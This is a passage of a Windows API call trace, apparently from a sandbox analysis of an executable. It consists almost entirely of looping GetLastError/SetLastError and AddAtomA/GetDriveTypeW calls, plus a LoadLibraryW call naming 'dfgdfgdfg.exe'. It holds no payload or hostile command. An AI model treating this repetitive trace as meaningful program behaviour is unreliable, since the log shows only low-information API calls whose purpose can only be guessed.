(dwErrCode=0x0) [0108.162] GetLastError () returned 0x0 [0108.162] SetLastError (dwErrCode=0x0) [0108.162] GetLastError () returned 0x0 [0108.162] SetLastError (dwErrCode=0x0) [0108.162] GetLastError () returned 0x0 [0108.162] SetLastError (dwErrCode=0x0) [0108.162] GetLastError () returned 0x0 [0108.163] SetLastError (dwErrCode=0x0) [0108.163] GetLastError () returned 0x0 [0108.163] SetLastError (dwErrCode=0x0) [0108.163] GetLastError () returned 0x0 [0108.163] SetLastError (dwErrCode=0x0) [0108.163] GetLastError () returned 0x0 [0108.163] SetLastError (dwErrCode=0x0) [0108.163] GetLastError () returned 0x0 [0108.163] SetLastError (dwErrCode=0x0) [0108.163] GetLastError () returned 0x0 [0108.163] SetLastError (dwErrCode=0x0) [0108.163] GetLastError () returned 0x0 [0108.163] SetLastError (dwErrCode=0x0) [0108.163] GetLastError () returned 0x0 [0108.163] SetLastError (dwErrCode=0x0) [0108.163] GetLastError () returned 0x0 [0108.163] SetLastError (dwErrCode=0x0) [0108.163] GetLastError () returned 0x0 [0108.163] SetLastError (dwErrCode=0x0) [0108.163] GetLastError () returned 0x0 [0108.163] SetLastError (dwErrCode=0x0) [0108.163] GetLastError () returned 0x0 [0108.163] SetLastError (dwErrCode=0x0) [0108.163] GetLastError () returned 0x0 [0108.163] SetLastError (dwErrCode=0x0) [0108.163] GetLastError () returned 0x0 [0108.163] SetLastError (dwErrCode=0x0) [0108.163] GetLastError () returned 0x0 [0108.163] SetLastError (dwErrCode=0x0) [0108.163] GetLastError () returned 0x0 [0108.163] SetLastError (dwErrCode=0x0) [0108.164] GetLastError () returned 0x0 [0108.164] SetLastError (dwErrCode=0x0) [0108.164] GetLastError () returned 0x0 [0108.164] SetLastError (dwErrCode=0x0) [0108.164] GetLastError () returned 0x0 [0108.164] SetLastError (dwErrCode=0x0) [0108.164] GetLastError () returned 0x0 [0108.164] SetLastError (dwErrCode=0x0) [0108.164] GetLastError () returned 0x0 [0108.164] SetLastError (dwErrCode=0x0) [0108.164] GetLastError () returned 0x0 [0108.164] SetLastError (dwErrCode=0x0) [0108.164] GetLastError () returned 0x0 [0108.164] SetLastError (dwErrCode=0x0) [0108.164] GetLastError () returned 0x0 [0108.164] SetLastError (dwErrCode=0x0) [0108.164] GetLastError () returned 0x0 [0108.164] SetLastError (dwErrCode=0x0) [0108.164] GetLastError () returned 0x0 [0108.164] SetLastError (dwErrCode=0x0) [0108.164] GetLastError () returned 0x0 [0108.164] SetLastError (dwErrCode=0x0) [0108.164] GetLastError () returned 0x0 [0108.164] SetLastError (dwErrCode=0x0) [0108.164] GetLastError () returned 0x0 [0108.164] SetLastError (dwErrCode=0x0) [0108.164] GetLastError () returned 0x0 [0108.164] SetLastError (dwErrCode=0x0) [0108.164] GetLastError () returned 0x0 [0108.165] SetLastError (dwErrCode=0x0) [0108.165] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0108.165] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404966) returned 0x0 [0108.165] LoadLibraryW (lpLibFileName="dfgdfgdfg.exe") returned 0x0 [0108.166] AddAtomA (lpString=0x0) returned 0x0 [0108.166] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.166] AddAtomA (lpString=0x0) returned 0x0 [0108.166] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.166] AddAtomA (lpString=0x0) returned 0x0 [0108.166] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.166] AddAtomA (lpString=0x0) returned 0x0 [0108.166] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.166] AddAtomA (lpString=0x0) returned 0x0 [0108.166] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.166] AddAtomA (lpString=0x0) returned 0x0 [0108.166] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.166] AddAtomA (lpString=0x0) returned 0x0 [0108.166] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.166] AddAtomA (lpString=0x0) returned 0x0 [0108.166] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.166] AddAtomA (lpString=0x0) returned 0x0 [0108.166] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.166] AddAtomA (lpString=0x0) returned 0x0 [0108.166] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.166] AddAtomA (lpString=0x0) returned 0x0 [0108.166] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.166] AddAtomA (lpString=0x0) returned 0x0 [0108.166] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.166] AddAtomA (lpString=0x0) returned 0x0 [0108.166] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.167] AddAtomA (lpString=0x0) returned 0x0 [0108.167] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.168] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.168] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.169] AddAtomA (lpString=0x0) returned 0x0 [0108.169] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.170] AddAtomA (lpString=0x0) returned 0x0 [0108.170] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.171] AddAtomA (lpString=0x0) returned 0x0 [0108.171] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.171] AddAtomA (lpString=0x0) returned 0x0 [0108.171] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.171] AddAtomA (lpString=0x0) returned 0x0 [0108.171] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.171] AddAtomA (lpString=0x0) returned 0x0 [0108.171] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.171] AddAtomA (lpString=0x0) returned 0x0 [0108.171] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.171] AddAtomA (lpString=0x0) returned 0x0 [0108.171] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.171] AddAtomA (lpString=0x0) returned 0x0 [0108.171] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.171] AddAtomA (lpString=0x0) returned 0x0 [0108.171] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.171] AddAtomA (lpString=0x0) returned 0x0 [0108.171] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.171] AddAtomA (lpString=0x0) returned 0x0 [0108.171] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.171] AddAtomA (lpString=0x0) returned 0x0 [0108.171] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.171] AddAtomA (lpString=0x0) returned 0x0 [0108.171] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.171] AddAtomA (lpString=0x0) returned 0x0 [0108.171] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.171] AddAtomA (lpString=0x0) returned 0x0 [0108.171] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.171] AddAtomA (lpString=0x0) returned 0x0 [0108.171] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.171] AddAtomA (lpString=0x0) returned 0x0 [0108.171] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.171] AddAtomA (lpString=0x0) returned 0x0 [0108.171] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.171] AddAtomA (lpString=0x0) returned 0x0 [0108.171] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.172] AddAtomA (lpString=0x0) returned 0x0 [0108.172] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.172] AddAtomA (lpString=0x0) returned 0x0 [0108.172] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.172] AddAtomA (lpString=0x0) returned 0x0 [0108.172] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.172] AddAtomA (lpString=0x0) returned 0x0 [0108.172] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.172] AddAtomA (lpString=0x0) returned 0x0 [0108.172] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.172] AddAtomA (lpString=0x0) returned 0x0 [0108.172] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.172] AddAtomA (lpString=0x0) returned 0x0 [0108.172] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.172] AddAtomA (lpString=0x0) returned 0x0 [0108.172] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.172] AddAtomA (lpString=0x0) returned 0x0 [0108.172] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.172] AddAtomA (lpString=0x0) returned 0x0 [0108.172] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.172] AddAtomA (lpString=0x0) returned 0x0 [0108.172] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.172] AddAtomA (lpString=0x0) returned 0x0 [0108.172] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.172] AddAtomA (lpString=0x0) returned 0x0 [0108.172] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.172] AddAtomA (lpString=0x0) returned 0x0 [0108.172] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.172] AddAtomA (lpString=0x0) returned 0x0 [0108.172] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.172] AddAtomA (lpString=0x0) returned 0x0 [0108.172] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.172] AddAtomA (lpString=0x0) returned 0x0 [0108.172] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.172] AddAtomA (lpString=0x0) returned 0x0 [0108.172] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.173] AddAtomA (lpString=0x0) returned 0x0 [0108.173] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.174] AddAtomA (lpString=0x0) returned 0x0 [0108.174] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.175] AddAtomA (lpString=0x0) returned 0x0 [0108.175] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.176] AddAtomA (lpString=0x0) returned 0x0 [0108.176] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] AddAtomA (lpString=0x0) returned 0x0 [0108.177] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0108.177] 